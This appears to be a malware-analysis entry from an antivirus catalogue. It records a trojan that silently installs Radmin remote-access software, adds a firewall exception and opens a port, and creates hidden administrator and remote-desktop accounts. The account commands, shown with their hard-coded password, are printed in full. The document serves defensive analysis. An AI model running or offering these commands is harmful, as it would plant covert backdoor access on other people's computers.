Technical Information
- [<HKLM>\SYSTEM\ControlSet001\Services\raddrvv3] 'Start' = '00000001'
- [<HKLM>\SYSTEM\ControlSet001\Services\mirrorv3] 'Start' = '00000001'
- [<HKLM>\SYSTEM\ControlSet001\Services\RServer3] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\rserver30\rserver3.exe' = '<SYSTEM32>\rserver30\rserver3.exe:*:Enabled:Radmin Server 3'
- '<SYSTEM32>\rserver30\rserver3.exe' /service
- '<SYSTEM32>\rserver30\FamItrfc.Exe'
- '<SYSTEM32>\rserver30\rsetup.exe' /start
- '%TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe' /stop
- '<SYSTEM32>\rserver30\rsetup.exe' /intsetup
- '<SYSTEM32>\net1.exe' localgroup "Пользователи удаленного рабочего стола" admin1 /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" admin /add
- '<SYSTEM32>\net1.exe' localgroup администраторы admin1 /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s admin1 /add
- '<SYSTEM32>\net1.exe' localgroup администраторы helpAssistant /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s helpAssistant /add
- '<SYSTEM32>\net1.exe' user helpAssistant /delete
- '<SYSTEM32>\net1.exe' user HelpAssistant 952005s /add /expires:never /passwordchg:yes /times:all
- '<SYSTEM32>\net1.exe' user Admin1 952005s /add /expires:never /passwordchg:yes /times:all
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' -Embedding 03745E15A3C18CAFC9BDD9714DA06E46
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\inst.bat" /inst.bat"
- '<SYSTEM32>\msiexec.exe' /i "%TEMP%\msupdate.msi" /qn /norestart
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 1024 all
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\runonce.exe' -r
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\rserver30\wsock32.dll,ntskd noreboot
- <SYSTEM32>\rserver30\Radmin30ru.chm
- <SYSTEM32>\rserver30\Radmin30.chm
- <SYSTEM32>\rserver30\eula.txt
- <SYSTEM32>\rserver30\1049.lng_rad
- %WINDIR%\Installer\MSIA.tmp
- %WINDIR%\Installer\MSI9.tmp
- <SYSTEM32>\rserver30\wsock32.dll
- <SYSTEM32>\rserver30\raddrvv3.sys
- <SYSTEM32>\rserver30\rsetup.exe
- <SYSTEM32>\rserver30\vcintsx.dll
- <SYSTEM32>\rserver30\vcintcx.dll
- <SYSTEM32>\rserver30\rminiv3.sys
- <SYSTEM32>\rserver30\mirrorv3.cat
- <SYSTEM32>\rserver30\mirrorv3.inf
- <SYSTEM32>\rserver30\mirrorv3.dll
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\NewShortcut4_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\Z_MENU_SRVCFG_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\ARPPRODUCTICON.exe
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\NewShortcut3_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %WINDIR%\Installer\MSI15.tmp
- %WINDIR%\Installer\MSI14.tmp
- %WINDIR%\Installer\MSI12.tmp
- %WINDIR%\Installer\MSI11.tmp
- %WINDIR%\inf\oem3.PNF
- %WINDIR%\inf\oem3.inf
- <SYSTEM32>\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.CAT
- <DRIVERS>\SETD.tmp
- %WINDIR%\Installer\MSI10.tmp
- %WINDIR%\Installer\MSIF.tmp
- <SYSTEM32>\SETE.tmp
- %WINDIR%\Installer\MSI5.tmp
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI3.tmp
- C:\Config.Msi\2d02a.rbs
- <SYSTEM32>\rserver30\WinLpcDl.dll
- %WINDIR%\Installer\MSI8.tmp
- %WINDIR%\Installer\MSI7.tmp
- %WINDIR%\Installer\MSI2.tmp
- %WINDIR%\Installer\2d027.msi
- %TEMP%\msupdate.msi
- %TEMP%\inst.bat
- %WINDIR%\Installer\MSI1.tmp
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\FirewallInstallHelper.dll
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe
- <SYSTEM32>\rserver30\rschatx.dll
- <SYSTEM32>\rserver30\CHATLOGS\info.txt
- <SYSTEM32>\rserver30\rchatx.dll
- <SYSTEM32>\rserver30\ChatLPCx.dll
- <SYSTEM32>\rserver30\rsaudiox.dll
- <SYSTEM32>\rserver30\voicex.dll
- <SYSTEM32>\rserver30\raudiox.dll
- <SYSTEM32>\rserver30\rsl.exe
- <SYSTEM32>\rserver30\FamItrf2.Exe
- <SYSTEM32>\rserver30\FamItrfc.Exe
- <SYSTEM32>\rserver30\WinLpcDl2.dll
- <SYSTEM32>\rserver30\FirewallInstallHelper.dll
- <SYSTEM32>\rserver30\RCursor.dll
- <SYSTEM32>\rserver30\R_sui.dll
- <SYSTEM32>\rserver30\rserver3.exe
- <SYSTEM32>\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.CAT
- C:\Config.Msi\2d02a.rbs
- %WINDIR%\Installer\MSI14.tmp
- %WINDIR%\Installer\MSI5.tmp
- %WINDIR%\Installer\MSI11.tmp
- %WINDIR%\Installer\MSI12.tmp
- %WINDIR%\Installer\MSI15.tmp
- %WINDIR%\Installer\2d027.msi
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\FirewallInstallHelper.dll
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI7.tmp
- %WINDIR%\Installer\MSI3.tmp
- %WINDIR%\Installer\MSI1.tmp
- %WINDIR%\Installer\MSI2.tmp
- %WINDIR%\Installer\MSIF.tmp
- %WINDIR%\Installer\MSI10.tmp
- %WINDIR%\Installer\MSIA.tmp
- %WINDIR%\Installer\MSI8.tmp
- %WINDIR%\Installer\MSI9.tmp
- from <SYSTEM32>\SETE.tmp to <SYSTEM32>\mirrorv3.dll
- from <DRIVERS>\SETD.tmp to <DRIVERS>\rminiv3.sys
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'